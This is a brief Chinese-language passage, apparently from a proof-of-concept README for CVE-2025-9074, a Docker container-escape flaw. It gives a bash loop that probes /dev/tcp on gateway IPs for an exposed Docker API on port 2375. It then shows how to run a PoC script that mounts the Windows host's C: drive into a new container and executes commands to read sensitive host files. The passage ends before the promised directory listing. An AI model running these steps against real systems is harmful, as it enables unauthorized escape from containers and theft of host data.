在容器内部,使用以下命令查找存在漏洞的Docker API:
for ip in 172.18.0.1 172.17.0.1 192.168.65.7; do
(echo > /dev/tcp/$ip/2375 2>/dev/null && echo "[+] $ip:2375 open") || :
done
使用以下bash脚本:
$ ./cve-2025-9074-poc.sh <IP> <PORT> <CMD>
该脚本将创建一个新的Docker镜像,将宿主机的Windows C盘挂载到/host_root/目录,启动镜像,然后执行命令(该命令可能是你需要通过读取宿主机敏感文件来利用的内容)。
以下展示列出挂载的'/host_root/'目录:
